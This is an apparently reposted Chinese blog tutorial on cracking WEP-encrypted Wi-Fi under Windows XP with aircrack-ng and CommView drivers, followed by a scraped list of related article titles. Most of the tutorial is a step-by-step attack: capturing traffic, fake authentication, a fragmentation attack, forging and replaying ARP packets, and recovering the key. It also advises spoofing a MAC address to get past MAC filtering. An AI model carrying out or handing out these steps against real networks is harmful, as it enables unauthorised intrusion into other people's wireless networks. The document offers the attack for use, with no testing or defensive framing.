XP下使用aircrack注入式破解WEP(Commview支持网卡)
来源:互联网 发布:单片机电路图仿真 编辑:程序博客网 时间:2024/06/05 15:09
这篇文章是介绍怎么在Windows xp下面使用airrack和注入式攻击来破解WEP
准备:
一. 首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动。
Commview所支持的网卡http://www.tamos.com/products/commwifi/adapterlist.php
1. 如果你的网卡被commview支持的话,那么点下面的地址下载驱动:
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip
2. 如果不被commview支持的网卡则可以下载widpackets的驱动:
http://www.wildpackets.com/support/downloads/drivers
注意:下面的教程是在你正确安装commview的驱动的前提下进行的!
二.
你需要下载这个.dll文件(只适用于commview 的网友):
http://darkircop.org/commview.dll
三. 你需要下载aircrack 压缩包:
http://download.aircrack-ng.org/aircrack-ng-1.0-rc1-win.zip
四. 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘
五. 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\
六. 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).
当你完成以上准备以后,就可以开始正式的破解了!
破解:
1:打开一个命令提示符 (开始 > 运行 > cmd.exe)
2:在命令提示符窗口下面输入:
Cd c:\aircrack
按下回车
3 在命令相同的提示符窗口下面输入:
airserv-ng -d commview.dll
按下回车
你看到的回复应该跟下面一样:
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666
如果你没有看到上面的结果的话,而是看到下面的结果的话:
注意这里可能会有两种情况出现!!!!!:
(1)
"Opening card commview.dll
Adapter not found
get_guid()
airserv-ng: wi_open(): No error"
这种情况那么你可以试试这个命令:
airserv-ng -d "commview.dll|debug"
然后你可能会看到下面的结果
Opening card commview.dll|debug
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
mboCard Gold - Paketplaner-Miniport
Adapter not found
get_guid()
airserv-ng: wi_open(): No error
那么你只要输入下面的命令就可以了
airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"
或者会自动搜寻网卡,然后提示你是不是这个网卡,然你选yes/no,那么你需要选择yes就可以了
(2)"Opening card commview.dll
F1
init_lib()
airserv-ng: wi_open(): No error"
这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.
实例:
破解AP的ESSID = wifi16
破解AP的BSSID = 11:22:33:44:55:66
破解AP的CHANNEL=6
自己用于监听网卡的MAC = 01:23:45:67:89:01
1.首先监听AP
airodump-ng --channel 6 --write Filename 127.0.0.1:666
2.建立虚拟连接:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666
如果一切正常的话那么你会得到下面的回复:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
如果你得到:
AP rejects the source MAC address
这说明你AP设置了MAC过滤,那你需要把你的MAC地址改成破解网络允许的地址.
如果你持续得到:
sending authentication request
那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.
3.利用-5碎片攻击模式进行攻击
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666
如果成功将会得到一个xor文件,例如文件为fragment-0124-161129.xor
4.利用packetforge-ng 构造一个用于注入的arp包
packetforge-ng -0 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w myarp
5.利用-2的arp注入攻击模式进行注入
aireplay-ng -2 -r myarp 127.0.0.1:666
6.利用aircrack来破解WP
aircrack-ng -n 64 Filename.cap
转载自:http://hi.baidu.com/suntb/item/5eeead27085d3e0e43634a23
- XP下使用aircrack注入式破解WEP(Commview支持网卡)
- Aircrack-ng破解WEP
- Aircrack-ng 简单的WEP加密破解(下)
- Aircrack-ng支持网卡列表(下)
- BT3中aircrack所支持破解的网卡
- kali下使用aircrack-ng破解wifi
- 使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。
- 使用Aircrack-ng工具破解WEP、WPA/WPA2加密的无线网络
- 无线安全及Aircrack-ng for Windows破解无线wep,wap密码(附图)/下载 教程 使用 用法 破解
- Aircrack-ng破解WEP、WPA-PSK加密利器
- BT5 aircrack-ng破解无线密码(wpa/wep)
- 完全教程 Aircrack-ng破解WEP、WPA-PSK加密利器
- 完全教程 Aircrack-ng破解WEP、WPA-PSK加密利器
- Aircrack-ng 简单的WEP加密破解(上)
- 完全教程 Aircrack-ng破解WEP、WPA-PSK加密利器
- 完全教程 Aircrack-ng破解WEP、WPA-PSK加密利器
- WEP/WPA-PSK密码破解工具aircrack-ng
- 让RTL8187无线网卡在linux 2.6.28内核支持aircrack-ng注入。
- 配置virtual虚拟机串口时出现的问题及解决办法
- c 结构对齐
- Eclipse中查看jar包中的源码
- 二叉树的非递归遍历
- C++进行base64编码和解码
- XP下使用aircrack注入式破解WEP(Commview支持网卡)
- 在linux中,如何增加、修改、删除、暂停和冻结用户名
- 在windows下使用Visual Leak Detector + Visual Studio 2008进行内存泄漏分析
- 进程的几个操作
- 二叉树 面试
- 算法导论 5.1-2
- Install ruby 1.9.3-p125 from source
- 关于大小端存储的问题
- iOS 299刀有线无线发布流程